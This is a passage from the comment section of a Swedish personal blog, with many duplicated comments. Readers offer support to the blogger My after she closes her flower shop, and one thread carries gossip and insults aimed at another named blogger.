 71. Fina My. Så stark du är som delar med dig av allt som händer. Jag önskar dig all lycka framåt och att du kan landa o börja må bättre, att du slipper din ångest. Stor kram o varmt lycka till

 72. Styrkekramar till dig My! Men..det viktigaste av allt.. Du är frisk och lilleman är frisk! Det enda som betyder något. Lätt att säga jag vet, men det kunde varit värre My! Du kommer gå stärkt ur det här!

 73. Så tråkigt med din fina butik, min favorit att handla blommor och annat fint där och alltid fantastisk service! Jag lider verkligen ned dig My och skickar all beundran för din styrka o mod och massa kramar till dig!!

 74. Ditt beslut är helt rätt, med tiden blir det bara klarare och klarare för dig.
  Som du har kämpat!
  Det kommer att komma mycket gott ur detta.
  All heder åt dig, My!
  Kramar!!!

 75. Stark historia som griper tag i en! Vad du har byggt upp, drivit och kämpat i så ung ålder. Det kommer gå bra för dig då du har nåt väldigt unikt! Tråkigt att höra om ditt företag, men när en dörr stängs öppnas en annan. Tänk vilken erfarenhet du har! Lycka till! Kommer fortsätta läsa din blogg som jag gjort från börjsn, hoppas du fortsätter dela med dig, modiga du!! 🙂

  • Men snälla ni! Det handlar om PENGAR!! Visst, en persons ”värde” är satt i botten. Men varför? Pga pengar. Roten till allt ont. Det gick inte runt pga konkurrens. Ja, sånt händer varje dag. Man behöver inte gråta

   • Pengar….du måste skämta, har du ens läst vad My gått igenom känslomässigt? Nä du behöver inte gråta, tror du att du är någon att avgöra vem som får gråta! Man börjar ju faktiskt skratta åt din kommentar.

   • Lisa E. Du ser det bara som pengar,My har byggt upp detta under många år och slitit, kämpat när annat hänt också. Hon har haft det tufft i ungdomen och slitit mycket ensam. Klart det blir en sorg, livsomställning.
    Styrkekram till My!

 76. Vad modig du är! Du har verkligen kämpat och att ta det beslutet själv visar vilken kämpe du är! Nu får du bryta ihop och komma igen! Stort lycka till i fortsättningen och stor kram. ❤️

 77. Hej My!
  Du är fantastisk som är öppen med detta. Tänkte precis skriva som Maria ovan.
  Du är ung. Du är entreprenör. Du är driven. Du kommer tillbaka även om My’s Blommor var mer än ett vanligt jobb.
  Det du drabbats av är livet. Livet lär. Livet är en berg och dalbana….man åker med och ibland fastnar man en stund på botten.
  Du fixar detta!
  Ta han om dig. Landa. Sörj. Låt det ta den tid som behövs.
  En stor kram från en som åkt denna berg-och-dal-bana i över 50 år och vet att det ordnar sig tillslut…även om det är nattsvart just nu. //Madde

 78. Du gör helt rätt My! Det kommer bli lättare med tiden. Ta det lugnt och omge dig med människor som betyder nåt för dig. Lycka till i fortsättningen:)

 79. Förstår att det är tufft just nu. Men när du landat i detta så väntar nya äventyr. Du kämpade ända in i kaklet. Du ska vara stolt över dessa 10 år. Nu är det dax att hämta kraft. Bli dig själv igen. Kunna skratta och le. Släppa dåligt samvete. Du fixar detta. Kram på dig

 80. Hej My!
  De var tråkigt att höra, jag som hade tänkt åka till dig i affären och handlat lite, men hälsan gå före hoppas du mår bättre snart!
  Många kramar till dig!
  MVH//Johanna

 81. Ett klokt beslut. För mig ett väntat beslut. Det kommer bli bra vad det lider. Det är tufft nu. Jag förstår det. Men allt kommer hamna på plats och du kommer att landa.
  Lycka till ❤

 82. Har läst din blogg en kort tid bara men har blivit imponerad av ditt driv och närheten till dig själv och andra. Du bemöter alla kommentarer på ett fantastiskt vänligt sätt, även då du blir ifrågasatt. Din personlighet kommer ta dig långt, jättelångt! Hoppas attdu inser din styrka. Många kramar… Där det ena tar slut tar det andra vid . All lycka!

 83. Hej My!
  Vad jag inte förstår är att om du betalt alla skulder varför säljer du inte företaget istället?? Då kanske du kan få ut lite pengar, eller är det kanske för att lönegarantin ska gå ut till dina anställda men kanske dags att tänka på dig själv, dom klarar sig ändå:) Hoppas du inte tror att detta är näthat som du har trott varje gång jag kommenterat. Tycker faktiskt du är en stark och härlig person och önskar dig all Lycka Till i framtiden. Styrkekram

 84. Du är så modig och har tagit ett riktigt beslut. Som du har försökt under alla dessa år, mer kan man inte göra. Du har inget att varken skämmas för eller ångra, du har en erfarenhet som du kommer att bära med dig. När du mår bättre och landar i allt så kommer du att hitta nya vägar med dina erfarenheter. Jag är övertygad om att du kommer att nå nya höjder igen duktiga fantastiska kvinna som du är. Ta hand om dig och fortsätt gå i terapi, det hjälper…. Kram

 85. Hej My! Vissa saker behöver man själv uppleva för att riktigt förstå, denna situation du befinner dig i är en sådan! Det krävs styrka och mod för att orka allt det som du går igenom nu! Du är så stark och modig och du kommer lyckas bra framöver när nya dörrar öppnas! Blicka nu framåt och ta hand om dig. Önskar dig lycka till med allt! Stor kram till dig fina My

 86. Du är en stark kvinna med en enorm drivkraft. Allt kommer ordna sig med tiden ska du se, du kommer igen starkare än nånsin. Stor styrkekram

 87. Åh så ledsamt att läsa. Du har alltid sett som mest glad och tillfreds ut på bilderna som tagits i butiken, och om den känslan går igenom bilderna så kan jag nog inte ens till liten del förstå hur jobbigt detta är för dig. Men oj vad rakryggad du ska gå ur detta My, som du kämpat!! Helt otroligt att du orkat, men som du skriver så är du en stark person som kommer ta dig igenom även detta. Ta hand om dig, sörj när det behövs, skratta när det behövs och ta en dag i taget! Styrke kramar i massor från en som gillar dig blogg till tusen för att du alltid känns genuin och ärlig

 88. Klart du kommer tillbaka! Du är en entreprenör och du har skaffat dig en stor kunskapsbank i att driva ett företag. Det är bara sunt att avsluta ett företag som gått med förlust i 3 år. Se till att vila upp dig, sen när du får perspektiv på vad som hänt ska du använda dina erfarenheter till ditt nästa steg i livet. Anklaga inte dig sjäv, det är inte brottsligt att gå i konkurs.

 89. Tårarna rinner när jag läser ditt inlägg. Känner med dig! Stor styrkekram❤️ Fortsätt kämpa och Lycka till. Gud välsigne dig❤️

 90. Wow! Starka underbara kvinna! Beundrar dig enormt!
  Många styrkekramar till dig och jag tror utan tvekan att du kommer ta dig igenom det här och göra något fantastiskt när du väl är redo!
  lyckos din son som har en så stark och modig mamma! Han kan va stolt han!! ❤️❤️

 91. Det du går igenom nu är ju också (en såklart jobbig, men även) något som ger dig ännu mer erfarenhet inför nya framtida jobbuppdrag. Du sitter ju på väldigt mycket erfarenhet och kunskap som ger dig fördelar. Du är modig. Vågar. Du kan söka massa jobb och är otroligt kompetent.

  • Men snälla ni! Det handlar om PENGAR!! Visst, en persons ”värde” är satt i botten. Men varför? Pga pengar. Roten till allt ont. Det gick inte runt pga konkurrens. Ja, sånt händer varje dag. Man behöver inte gråta

   • Pengar….du måste skämta, har du ens läst vad My gått igenom känslomässigt? Nä du behöver inte gråta, tror du att du är någon att avgöra vem som får gråta! Man börjar ju faktiskt skratta åt din kommentar.

   • Lisa E. Du ser det bara som pengar,My har byggt upp detta under många år och slitit, kämpat när annat hänt också. Hon har haft det tufft i ungdomen och slitit mycket ensam. Klart det blir en sorg, livsomställning.
    Styrkekram till My!

 92. Hej My!
  Du är fantastisk som är öppen med detta. Tänkte precis skriva som Maria ovan.
  Du är ung. Du är entreprenör. Du är driven. Du kommer tillbaka även om My’s Blommor var mer än ett vanligt jobb.
  Det du drabbats av är livet. Livet lär. Livet är en berg och dalbana….man åker med och ibland fastnar man en stund på botten.
  Du fixar detta!
  Ta han om dig. Landa. Sörj. Låt det ta den tid som behövs.
  En stor kram från en som åkt denna berg-och-dal-bana i över 50 år och vet att det ordnar sig tillslut…även om det är nattsvart just nu. //Madde

 93. Förstår att det är tufft just nu. Men när du landat i detta så väntar nya äventyr. Du kämpade ända in i kaklet. Du ska vara stolt över dessa 10 år. Nu är det dax att hämta kraft. Bli dig själv igen. Kunna skratta och le. Släppa dåligt samvete. Du fixar detta. Kram på dig

 94. Har läst din blogg en kort tid bara men har blivit imponerad av ditt driv och närheten till dig själv och andra. Du bemöter alla kommentarer på ett fantastiskt vänligt sätt, även då du blir ifrågasatt. Din personlighet kommer ta dig långt, jättelångt! Hoppas attdu inser din styrka. Många kramar… Där det ena tar slut tar det andra vid . All lycka!

 95. Tråkigt med butiken.
  Men du har ju det finaste kvar, det som är viktigast i livet, din Lilleman.
  Var lite orolig att beslutet innefattade honom så det var ju skönt att det ” bara” var butiken/matriellt.
  Lycka till i framtiden med vad du än tar dig för. Du kanske startar upp någon träning/hälso butik istället….

 96. Wow! Starka underbara kvinna! Beundrar dig enormt!
  Många styrkekramar till dig och jag tror utan tvekan att du kommer ta dig igenom det här och göra något fantastiskt när du väl är redo!

  lyckos din son som har en så stark och modig mamma! Han kan va stolt han!! ❤️❤️

 97. Det du går igenom nu är ju också (en såklart jobbig, men även) något som ger dig ännu mer erfarenhet inför nya framtida jobbuppdrag. Du sitter ju på väldigt mycket erfarenhet och kunskap som ger dig fördelar. Du är modig. Vågar. Du kan söka massa jobb och är otroligt kompetent.

 98. Tyckte väl jag kände igen din far. Känd som ”gaphalsen” ju. Hoppas allt löser sig för dig på bästa sätt. Lycka till!

 99. Tråkigt med butiken.
  Men du har ju det finaste kvar, det som är viktigast i livet, din Lilleman.
  Var lite orolig att beslutet innefattade honom så det var ju skönt att det ” bara” var butiken/matriellt.
  Lycka till i framtiden med vad du än tar dig för. Du kanske startar upp någon träning/hälso butik istället….

 100. Tyckte väl jag kände igen din far. Känd som ”gaphalsen” ju. Hoppas allt löser sig för dig på bästa sätt. Lycka till!

 101. Du har verkligen gjort allt och lite till för att få till de, men de viktigaste är ändå dina nära och kära runt dig!
  Nu har du nått botten och då är de bara att klättra uppför igen, de är tungt och jobbigt och gör väldigt ont, men du kommer att gå ännu starkare ur de här!!! Du är en ung fin vacker och duktig tjej My!!!
  All lycka och välgång till dig och de dina i framtiden!!!
  Kram

 102. Oh herregud…jag sitter och gråter när jag läser ditt inlägg…. Massa styrkekramar till dig vackraste och starkaste My. <3 <3

 103. Vilken kämpe du är! Fasen vad du hunnit vara med om och göra på så kort tid!! Snacka om modig, med skinn på näsan och sån styrka. Du är ju enormt driven så tvekar inte en sekund på att du kommer hitta på massa nytt när du fått landa och slicka dina sår. Passa på att andas ut, sörja och samla krafter så kommer du ut ändå starkare och klokare på andra sidan. Massa kramar

 104. Du har verkligen gjort allt och lite till för att få till de, men de viktigaste är ändå dina nära och kära runt dig!
  Nu har du nått botten och då är de bara att klättra uppför igen, de är tungt och jobbigt och gör väldigt ont, men du kommer att gå ännu starkare ur de här!!! Du är en ung fin vacker och duktig tjej My!!!
  All lycka och välgång till dig och de dina i framtiden!!!
  Kram

 105. Hoppas du mår bättre snart. Vilken tjej du är du ska va stolt över dig själv hur många skulle orkat som du. Börjat så tidigt att kämpa så hårt ensam. Kram

 106. Oh herregud…jag sitter och gråter när jag läser ditt inlägg…. Massa styrkekramar till dig vackraste och starkaste My. <3 <3

 107. Sorgligt att höra att du tvingas lägga ner butiken! Men utan tvekan rätt beslut! Min sambo och hans familj hade familjeföretag som de efter många års kämpande och ”inputtande” av pengar tvingades lägga ner. Även de med ”fanan” högt – de såg till att betala skatt och moms osv.. Nu flera år senare mår alla inblandade så mycket bättre! Slut på sömnlösa nätter och en massa oro! Sönerna har fått väldigt bra jobb efter det så min svärfar kan känns sig nöjd trots allt. De fick den bästa utbildningen man kan få – att driva eget är en riktigt bra skola och jag är övertygad om att du kommer att hitta något nytt spännande framöver. Känslan att bara vara anställd kommer att göra dig gott!! Mankan efter en veckas jobb koppla ifrån på ett annat sätt! Önskar dig lycka till när du har landat i allt!!

 108. Hej My!!
  Har följt dig länge på din blogg. Jag står bakom helt dina beslut du tagit o kommer att ta. Det finns bara ny möjligheter efter det här. Hur tungt det än varit och kommer att vara en tid. Nu får du samla dig och bara vara med lille man och tess. Äta sova och bara vara så är du på fötter igen. Så stark du är inombords. Jag kommer följa dig i varje spår du tar som så många andra gör.
  Som du skriver själv. Du sår rakryggad. Många kramar från mig och min familj.

 109. Vilken kämpe du är! Fasen vad du hunnit vara med om och göra på så kort tid!! Snacka om modig, med skinn på näsan och sån styrka. Du är ju enormt driven så tvekar inte en sekund på att du kommer hitta på massa nytt när du fått landa och slicka dina sår. Passa på att andas ut, sörja och samla krafter så kommer du ut ändå starkare och klokare på andra sidan. Massa kramar

 110. STOR STYRKE KRAM!!! Du kommer att gå stark ur detta för du är en modig och stark kvinna det förstår man när man läser din berättelse…

 111. Hoppas du mår bättre snart. Vilken tjej du är du ska va stolt över dig själv hur många skulle orkat som du. Börjat så tidigt att kämpa så hårt ensam. Kram

 112. Sorgligt att höra att du tvingas lägga ner butiken! Men utan tvekan rätt beslut! Min sambo och hans familj hade familjeföretag som de efter många års kämpande och ”inputtande” av pengar tvingades lägga ner. Även de med ”fanan” högt – de såg till att betala skatt och moms osv.. Nu flera år senare mår alla inblandade så mycket bättre! Slut på sömnlösa nätter och en massa oro! Sönerna har fått väldigt bra jobb efter det så min svärfar kan känns sig nöjd trots allt. De fick den bästa utbildningen man kan få – att driva eget är en riktigt bra skola och jag är övertygad om att du kommer att hitta något nytt spännande framöver. Känslan att bara vara anställd kommer att göra dig gott!! Mankan efter en veckas jobb koppla ifrån på ett annat sätt! Önskar dig lycka till när du har landat i allt!!

 113. Hej My!!

  Har följt dig länge på din blogg. Jag står bakom helt dina beslut du tagit o kommer att ta. Det finns bara ny möjligheter efter det här. Hur tungt det än varit och kommer att vara en tid. Nu får du samla dig och bara vara med lille man och tess. Äta sova och bara vara så är du på fötter igen. Så stark du är inombords. Jag kommer följa dig i varje spår du tar som så många andra gör.

  Som du skriver själv. Du sår rakryggad. Många kramar från mig och min familj.

 114. STOR STYRKE KRAM!!! Du kommer att gå stark ur detta för du är en modig och stark kvinna det förstår man när man läser din berättelse…

 115. Jag är säker på att du fattat rätt beslut My. Och att du gjort rätt som vänt på alla stenar. Nu väntar en ny framtid med vind i seglen. Tack för att du så modigt delat med dig om ditt mående. Kram och lycka till!

 116. Jag är säker på att du fattat rätt beslut My. Och att du gjort rätt som vänt på alla stenar. Nu väntar en ny framtid med vind i seglen. Tack för att du så modigt delat med dig om ditt mående. Kram och lycka till!

 117. Massa kärlek till dig och dina anställda My ❤ Du har kämpat hårt, verkligen gett allt och det beundrar jag dig för. Förstår att det är ett sjukt tungt beslut att behöva ta och att det är absolut den sista utvägen. Hoppas du hittar ett lugn, låter dig vara ledsen och sen komma upp på fötter igen. Ta en ordentlig semester, det är du värd. Antar att du under dessa 10 år inte ofta varit helt ledig. Tänk så många du gjort glada och så många arbetsplatser du skapat genom åren genom My’s blommor. Fp människor lyckas med det under en hel livstid och du är inte ens 30! Med ditt driv och din personlighet kommer du att kommer du att komma långt, det är jag säker på. Ta hand om dig och lilleman ❤ Du är fantastisk, glöm inte det!

 118. Massa kärlek till dig och dina anställda My ❤ Du har kämpat hårt, verkligen gett allt och det beundrar jag dig för. Förstår att det är ett sjukt tungt beslut att behöva ta och att det är absolut den sista utvägen. Hoppas du hittar ett lugn, låter dig vara ledsen och sen komma upp på fötter igen. Ta en ordentlig semester, det är du värd. Antar att du under dessa 10 år inte ofta varit helt ledig. Tänk så många du gjort glada och så många arbetsplatser du skapat genom åren genom My’s blommor. Fp människor lyckas med det under en hel livstid och du är inte ens 30! Med ditt driv och din personlighet kommer du att kommer du att komma långt, det är jag säker på. Ta hand om dig och lilleman ❤ Du är fantastisk, glöm inte det!

 119. Stark historia, måste varit jättejobbigt att kämpa så helt ensam som du har gjort, det visar vilken ryggrad du har, vilken oerhört stark och tålmodig driven tjej du är. All heder till dig, jag säger som många andra sagt här, det är inte kriminellt att göra konkurs, absolut inte, det har hänt de bästa företagarna.
  Jag säger också, omge dig med människor som bryr sig om dig för DIN skull, det är i motgång man ser vem som är ens verkliga vänner, i medvind vill alla vara ens vänner.
  Du borde skriva en bok om hur det varit att vara egen företagare under så enormt tuffa förhållanden, du har självfallet oerhört mycket att lära unga människor som funderar på att starta eget, herregud, du skulle kunna bli föreläsare om hur det är att börja som ung företagare, och varna ungdomar vilka fallgropar man ska undvika.
  Du kommer att gå ännu starkare ur detta än vad du är.
  Lycka till fina My.

 120. Stark historia, måste varit jättejobbigt att kämpa så helt ensam som du har gjort, det visar vilken ryggrad du har, vilken oerhört stark och tålmodig driven tjej du är. All heder till dig, jag säger som många andra sagt här, det är inte kriminellt att göra konkurs, absolut inte, det har hänt de bästa företagarna.

  Jag säger också, omge dig med människor som bryr sig om dig för DIN skull, det är i motgång man ser vem som är ens verkliga vänner, i medvind vill alla vara ens vänner.

  Du borde skriva en bok om hur det varit att vara egen företagare under så enormt tuffa förhållanden, du har självfallet oerhört mycket att lära unga människor som funderar på att starta eget, herregud, du skulle kunna bli föreläsare om hur det är att börja som ung företagare, och varna ungdomar vilka fallgropar man ska undvika.

  Du kommer att gå ännu starkare ur detta än vad du är.

  Lycka till fina My.

 121. Många många kramar f bearbetning O sorg O tillåtelse ledsamhet O besvikelse ilska O tårar.
  Å kramar i det viktiga, tillit !!!! Förtröstan? Hopp. Återhämtning O glädje igen. Å hälsa O familjen.
  Å till att finna en en f dig vardag O tillräcklig balans O harmoni …..
  Vart mä om massa annat men inte just det du nu går igenom. Men vill bara krama om dig massor O ge den kraft O tröst du kanske behöver!!!!
  Stooooor kraaaam
  Å tillit….. Oavsett vad.
  Kram
  Anna

 122. Många många kramar f bearbetning O sorg O tillåtelse ledsamhet O besvikelse ilska O tårar.

  Å kramar i det viktiga, tillit !!!! Förtröstan? Hopp. Återhämtning O glädje igen. Å hälsa O familjen.

  Å till att finna en en f dig vardag O tillräcklig balans O harmoni …..

  Vart mä om massa annat men inte just det du nu går igenom. Men vill bara krama om dig massor O ge den kraft O tröst du kanske behöver!!!!

  Stooooor kraaaam
  Å tillit….. Oavsett vad.

  Kram
  Anna

 123. Förstår att det känns supertufft, men det kommer att bli bra om ett tag. När jag var sjuk i cancer så hjälpte det mig att tänka, det finns dom som har det värre. Tänk så, så kanske det blir lättare. Det enda som betyder ngt är att du och din son är friska. Det är det värsta som kan hända, att ens barn dör. Vill dock inte förringa dina känslor runt butiken då det har blivit din baby, men stanna upp, tänk på dom som har det värre så kommer du känna att allt kommer ordna sig, så länge nära och kära är friska. Kram på dig

 124. Tråkigt med ditt företag men det måste ju vara något mer som gjort att alla har vänt dig ryggen just nu. Väldigt tråkiga och hjärtlösa sk. vänner annars.
  Lycka till i fortsättningen med vad du än kommer att göra.
  Hälsningar skåne.

 125. Förstår att det känns supertufft, men det kommer att bli bra om ett tag. När jag var sjuk i cancer så hjälpte det mig att tänka, det finns dom som har det värre. Tänk så, så kanske det blir lättare. Det enda som betyder ngt är att du och din son är friska. Det är det värsta som kan hända, att ens barn dör. Vill dock inte förringa dina känslor runt butiken då det har blivit din baby, men stanna upp, tänk på dom som har det värre så kommer du känna att allt kommer ordna sig, så länge nära och kära är friska. Kram på dig

 126. Tråkigt med ditt företag men det måste ju vara något mer som gjort att alla har vänt dig ryggen just nu. Väldigt tråkiga och hjärtlösa sk. vänner annars.
  Lycka till i fortsättningen med vad du än kommer att göra.
  Hälsningar skåne.

 127. Ovärderliga kunskaper du tar med dig in i ditt ”nya” liv. Önskar dig all lycka till My. Stor kram ❤️❤️

 128. Stark av dig My att ta ett sådant beslut! Det är tungt nu men du kommer starkare ur det. Många känslor som sluter dig nu men det kommer bli bra. Ta den tid du behöver för att stärka dig! Ta hand om dig, Lilleman och Tezz. Du är inte själv!
  Stykekramar till dig med energi

 129. Tänker på dig hoppas du kan få ro o landa i ditt beslut att du sen får må bra och kan njuta av allt livet har att erbjuda, många kramar

 130. Ovärderliga kunskaper du tar med dig in i ditt ”nya” liv. Önskar dig all lycka till My. Stor kram ❤️❤️

 131. Stark av dig My att ta ett sådant beslut! Det är tungt nu men du kommer starkare ur det. Många känslor som sluter dig nu men det kommer bli bra. Ta den tid du behöver för att stärka dig! Ta hand om dig, Lilleman och Tezz. Du är inte själv!
  Stykekramar till dig med energi

 132. Var idag och skulle köpa växter, visste inte att det var stängt! Så tråkigt! Har alltid handlat hos dig, du har alltid haft så fina växter till ett bra pris…Jag hoppas verkligen att du fortsätter med någon verksamhet, det har alltid känts spännande att åka till din affär och se vad du köpt in. Det har alltid varit nya grejer till bra pris.
  En fråga; jag såg att det fanns många växter kvar, vad händer med dom? Kommer dom att säljas under veckan?
  Lycka till, My!

 133. Tänker på dig hoppas du kan få ro o landa i ditt beslut att du sen får må bra och kan njuta av allt livet har att erbjuda, många kramar

 134. Var idag och skulle köpa växter, visste inte att det var stängt! Så tråkigt! Har alltid handlat hos dig, du har alltid haft så fina växter till ett bra pris…Jag hoppas verkligen att du fortsätter med någon verksamhet, det har alltid känts spännande att åka till din affär och se vad du köpt in. Det har alltid varit nya grejer till bra pris.

  En fråga; jag såg att det fanns många växter kvar, vad händer med dom? Kommer dom att säljas under veckan?
  Lycka till, My!

 135. Så synd att det blev så jobbigt før dig. Du är inte ensam om att ha gjort den här resan ska du veta. Jag har jobbat i turistbranschen och träffat på ganska många unga egna företagare. Många har ett kolossalt driv och är jätteduktiga och så börjar företaget växa och så blir de uppmärksammade . Alla tycker ju att det är så roligt med ungdomar som driver eget. Och så får de priser och folk vill att de ska göra mer och mer. Är man ung vill man göra allt som verkar roligt och man orkar jobba jättemycket samtidigt som förmågan att säga stopp och nej är ganska liten liksom förmågan att ta hand om sig själv och sina egna behov.
  Hoppas du kan hitta lite vila ett tag och sedan dra de bästa lärdomarna ur allt det du har gjort. Sedan tror jag nog att du kliver in i företagandet igen ?

 136. Hej My,
  Självklart har du tagit rätt beslut. Du var hoppfull och envis och det är en mycket bra egenskap men man måste också förstå när man ska släppa och gå vidare. Det har du gjort nu. Det är mycket bra och nödvändigt.
  En helt annan sak är att vi är några som verkligen är helt förundrade över vad som har hänt och hur Dame VanitaToftby har kunnat vända alla emot dig och vad hon håller på med egentligen, hur gör hon och framförallt varför?
  Du var tight med Magda och Madde med flera och ni var riktiga vänner. Nu ska DameVT bjuda in till bloggfest med dina före detta vänner. Hu så elakt när alla vet vad som har hänt dig. Så här kunde man göra på lekis när mamma kunde säga till en att det INTE var OK men nu…hu hu hu. Vilka människor!!! Förstår att du inte orkar ta i sån här bagatellartat skit just nu men vill bara att du ska veta att vi är väldigt många som förstår hur det ligger till med dom där äckliga tantiga tjuvnypen!
  Så här skrev ju Ilmrud om dig för bara några månader sedan:
  madeleineilmrud 28 september, 2015 kl. 22:23
  Kram till dig min FINA STARKA VÄN!
  Jag har själv blivit kallad WHITE TRASH av denna människa! Har hört företag berätta för mig vad Johanna sagt om mig. Och inte bara om mig för den delen, flera av oss har fått ta det skitsnacket!
  Och by the way…
  Om vi nu ska sncka om copycat, JAG började träna och utbilda mig till PT innan Toftby! Och långt innan det så slog Jane Fonda igenom – WHO IS THE FUCKING COPYCAT!
  Ja du fattar hur jag menar. Ingen vinner DEN tävlingen tyvärr!
  Precis som du skriver, vi vänner väljer att höja varandra istället. Tillsammans blir vi starkare <3
  Puss

  • Sophie om det nu är så. Så i min värld är det vuxen mobbig.
   Och har man en blogg…där man är emot näthat så är det ju inte ok.
   Sen kan ju vissa skriva mellan rader…och klappa sej själv på axeln
   och tycka vilka bra inlägg man gör. Så låg nivå….
   Jag önskar My all lycka i framtiden.

 137. Så synd att det blev så jobbigt før dig. Du är inte ensam om att ha gjort den här resan ska du veta. Jag har jobbat i turistbranschen och träffat på ganska många unga egna företagare. Många har ett kolossalt driv och är jätteduktiga och så börjar företaget växa och så blir de uppmärksammade . Alla tycker ju att det är så roligt med ungdomar som driver eget. Och så får de priser och folk vill att de ska göra mer och mer. Är man ung vill man göra allt som verkar roligt och man orkar jobba jättemycket samtidigt som förmågan att säga stopp och nej är ganska liten liksom förmågan att ta hand om sig själv och sina egna behov.
  Hoppas du kan hitta lite vila ett tag och sedan dra de bästa lärdomarna ur allt det du har gjort. Sedan tror jag nog att du kliver in i företagandet igen 🙂

 138. Hej My,

  Självklart har du tagit rätt beslut. Du var hoppfull och envis och det är en mycket bra egenskap men man måste också förstå när man ska släppa och gå vidare. Det har du gjort nu. Det är mycket bra och nödvändigt.

  En helt annan sak är att vi är några som verkligen är helt förundrade över vad som har hänt och hur Dame VanitaToftby har kunnat vända alla emot dig och vad hon håller på med egentligen, hur gör hon och framförallt varför?

  Du var tight med Magda och Madde med flera och ni var riktiga vänner. Nu ska DameVT bjuda in till bloggfest med dina före detta vänner. Hu så elakt när alla vet vad som har hänt dig. Så här kunde man göra på lekis när mamma kunde säga till en att det INTE var OK men nu…hu hu hu. Vilka människor!!! Förstår att du inte orkar ta i sån här bagatellartat skit just nu men vill bara att du ska veta att vi är väldigt många som förstår hur det ligger till med dom där äckliga tantiga tjuvnypen!

  Så här skrev ju Ilmrud om dig för bara några månader sedan:

  madeleineilmrud 28 september, 2015 kl. 22:23
  Kram till dig min FINA STARKA VÄN!

  Jag har själv blivit kallad WHITE TRASH av denna människa! Har hört företag berätta för mig vad Johanna sagt om mig. Och inte bara om mig för den delen, flera av oss har fått ta det skitsnacket!

  Och by the way…

  Om vi nu ska sncka om copycat, JAG började träna och utbilda mig till PT innan Toftby! Och långt innan det så slog Jane Fonda igenom – WHO IS THE FUCKING COPYCAT!

  Ja du fattar hur jag menar. Ingen vinner DEN tävlingen tyvärr!

  Precis som du skriver, vi vänner väljer att höja varandra istället. Tillsammans blir vi starkare <3

  Puss

  • Sophie om det nu är så. Så i min värld är det vuxen mobbig.
   Och har man en blogg…där man är emot näthat så är det ju inte ok.
   Sen kan ju vissa skriva mellan rader…och klappa sej själv på axeln
   och tycka vilka bra inlägg man gör. Så låg nivå….
   Jag önskar My all lycka i framtiden.

 139. Min mamma och jag gav oss för snart 7 år sen in i en karusell med att starta AB… Det startades först med min mamma och en vän till henne och dennes sambo, men då vi inte gick med vinst första månaden blev det många svängar med svek, bråk och skit snack, det blev lokal byte, min moster köpte in sig, och efter att ha kämpat med blod, svett och tårar i 3 år kände vi att förlusten blev så stor att vi valde att sätta företaget i konkurs! När vi slängdes in i en konkurs , av oss själva, var jag höggravid, min sambo hade precis bott på min ort ett år och vi hade precis köpt lägenhet! Det kändes som allt raserades… Det var ett tunt beslut att ta just då men i längden även det bästa! Vi la ner med huvudet högt, inte en krona hade vi i skuld och till och med pengar på kontot, men min mammaledig het och ingen möjlighet att anställa någon gjorde att vår resa var tvungen att ta slut! Mamma och jag släppte vår dröm, något som då var tufft , i efterhand kanske det bästa beslut vi tagit för oss skälva och vårt välmående! Min mammaledig het tog slut och jag vågade starta upp ett nytt företag, denna gång köpte vi inte en befintlig butik som gått dåligt, utan jag startade en butik helt från grunden!
  Hur ditt liv än blir så kommer du resa dig upp starkare! Låt det ta den tid det behöver!
  Kram

 140. Min mamma och jag gav oss för snart 7 år sen in i en karusell med att starta AB… Det startades först med min mamma och en vän till henne och dennes sambo, men då vi inte gick med vinst första månaden blev det många svängar med svek, bråk och skit snack, det blev lokal byte, min moster köpte in sig, och efter att ha kämpat med blod, svett och tårar i 3 år kände vi att förlusten blev så stor att vi valde att sätta företaget i konkurs! När vi slängdes in i en konkurs , av oss själva, var jag höggravid, min sambo hade precis bott på min ort ett år och vi hade precis köpt lägenhet! Det kändes som allt raserades… Det var ett tunt beslut att ta just då men i längden även det bästa! Vi la ner med huvudet högt, inte en krona hade vi i skuld och till och med pengar på kontot, men min mammaledig het och ingen möjlighet att anställa någon gjorde att vår resa var tvungen att ta slut! Mamma och jag släppte vår dröm, något som då var tufft , i efterhand kanske det bästa beslut vi tagit för oss skälva och vårt välmående! Min mammaledig het tog slut och jag vågade starta upp ett nytt företag, denna gång köpte vi inte en befintlig butik som gått dåligt, utan jag startade en butik helt från grunden!

  Hur ditt liv än blir så kommer du resa dig upp starkare! Låt det ta den tid det behöver!

  Kram

 141. Vad du måste ha burit mycket på dina axlar! Hur mycket har gömts bakom dina leenden? Du är stark, du kommer ta dig vidare och resa ur askan. Wow vilken styrka du måste besitta! Tänk vad du klarat av, och kommer klara i framtiden. Du vet att du gjort allt du kunnat. Styrkekramar skickas fastän vi inte känner varandra ?

 142. Vad du måste ha burit mycket på dina axlar! Hur mycket har gömts bakom dina leenden? Du är stark, du kommer ta dig vidare och resa ur askan. Wow vilken styrka du måste besitta! Tänk vad du klarat av, och kommer klara i framtiden. Du vet att du gjort allt du kunnat. Styrkekramar skickas fastän vi inte känner varandra 🙂

 143. Det kanske är tungt nu men du är ung, har redan uppnått så mycket och har så mycket erfarenhet. Du behöver nog bara landa lite nu och fundera sen tror jag att du kommer komma tillbaka större och starka än någonsin. Du fixar det här ?
  Kram

 144. Det kanske är tungt nu men du är ung, har redan uppnått så mycket och har så mycket erfarenhet. Du behöver nog bara landa lite nu och fundera sen tror jag att du kommer komma tillbaka större och starka än någonsin. Du fixar det här 🙂
  Kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

